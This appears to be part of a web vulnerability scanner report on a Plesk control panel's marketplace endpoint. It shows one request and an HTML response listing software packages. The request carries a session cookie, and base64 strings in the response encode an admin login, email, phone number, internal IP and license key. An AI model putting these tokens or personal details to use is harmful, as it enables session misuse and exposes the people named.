       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/search-data/catalogId/marketplace

Request

GET /smb/app/search-data/catalogId/marketplace?name=&vendor=&packager=&cert=any HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/market/id/marketplace
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:19 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:20 GMT
Connection: close
Content-Length: 52670

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/norton-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'>Norton Internet Security</a></h4>
<div class="package-description">Protect your desktop against viruses and spyware</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><img src="http://catalog.marketplace.parallels.com/storage/Persony%2C%20Inc./Persony%20Web%20Conferencing/2.2.24.0-15/Persony%2C%20Inc./undefined/undefined/undefined/resources/images/persony_icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'>Persony Web Conferencing</a></h4>
<div class="package-description">Meet and collaborate with customers using web and video conferencing</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><img src="http://catalog.marketplace.parallels.com/storage/WordPress.org/WordPress/3.0-5/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'>WordPress</a></h4>
<div class="package-description">Easily create or maintain a website or blog</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><img src="http://catalog.marketplace.parallels.com/storage/Pinnacle%20Cart%20Shopping%20Cart%20Software/PinnacleCart/3.7.7-350/www.pinnaclecart.com/undefined/undefined/undefined/resources/images/pinnacle-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'>PinnacleCart</a></h4>
<div class="package-description">None</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTA0LTI2JTI1M0ElMjUyRjEuMiUyNTJGUGlubmFjbGUlMjUyNTIwQ2FydCUyNTI1MjBTaG9wcGluZyUyNTI1MjBDYXJ0JTI1MjUyMFNvZnR3YXJlJTI1MkZQaW5uYWNsZUNhcnQlMjUyRjMuNy43LTM1MCUyNTJGd3d3LnBpbm5hY2xlY2FydC5jb20lMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5waW5uYWNsZWNhcnQuY29tJTI1MkYlMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0RQaW5uYWNsZUNhcnQlMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QzLjcuNyUyNmRldGFpbHMlMjU1QnJlbGVhc2UlMjU1RCUzRDM1MCUyNmRldGFpbHMlMjU1QnZlbmRvciUyNTVEJTNEUGlubmFjbGUlMkJDYXJ0JTJCU2hvcHBpbmclMkJDYXJ0JTJCU29mdHdhcmUlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEd3d3LnBpbm5hY2xlY2FydC5jb20lMjZkZXRhaWxzJTI1NUJpc0FwcyUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnBhY2thZ2VVcmwlMjU1RCUzRCZPcGVyYXRpb25JRD1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJmFwcF92ZW5kb3JfbmFtZT1QaW5uYWNsZStDYXJ0K1Nob3BwaW5nK0NhcnQrU29md
HdhcmUmYXBwX25hbWU9UGlubmFjbGVDYXJ0JmFwcF92ZXJzaW9uPTMuNy43JmFwcF9yZWxlYXNlPTM1MCZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnBpbm5hY2xlY2FydC5jb20lMkYm"); apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/drupal.org/Drupal/6.16-3/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'>Drupal</a></h4>
<div class="package-description">Publish, manage and organize a wide variety of content on a website</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/pd6fm_box_mp.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'>Parallels Desktop for Mac</a></h4>
<div class="package-description">Seamlessly run Windows applications on your Mac</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "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"); apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/domains-bttn-small.jpg"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'>Domain Names</a></h4>
<div class="package-description">Register a new .COM, .NET or .ORG domain name</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDEwLTEwLTA4JTI1M0ElMjUyRm5vbmUlMjUyRlBhcmFsbGVscyUyNTJGRG9tYWluJTI1MjUyME5hbWVzJTI1MkYxLTElMjUyRlBhcmFsbGVscyUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNmRldGFpbHMlMjU1QmFwcElkJTI1NUQlM0RodHRwJTI1M0ElMjUyRiUyNTJGd3d3LnBhcmFsbGVscy5jb20lMjUyRnByb2R1Y3RzJTI1MkZkbm4lMjUyRmRvbWFpbnMlMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0REb21haW4lMkJOYW1lcyUyNmRldGFpbHMlMjU1QnZlcnNpb24lMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJyZWxlYXNlJTI1NUQlM0QxJTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQYXJhbGxlbHMlMjZkZXRhaWxzJTI1NUJwYWNrYWdlciUyNTVEJTNEUGFyYWxsZWxzJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0QmT3BlcmF0aW9uSUQ9UFVSQ0hBU0VfQVBQTElDQVRJT05fTElDRU5TRSZhcHBfdmVuZG9yX25hbWU9UGFyYWxsZWxzJmFwcF9uYW1lPURvbWFpbitOYW1lcyZhcHBfdmVyc2lvbj0xJmFwcF9yZWxlYXNlPTEmYXBwX2d1aWQ9aHR0cCUzQSUyRiUyRnd3dy5wYXJhbGxlbHMuY29tJTJGcHJvZHVjdHMlMkZkbm4lM
kZkb21haW5zJg=="); apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'><img src="http://catalog.marketplace.parallels.com/storage/www.joomla.org/joomla/1.5.20-2/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]})'>joomla</a></h4>
<div class="package-description">Build website and powerful online applications</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
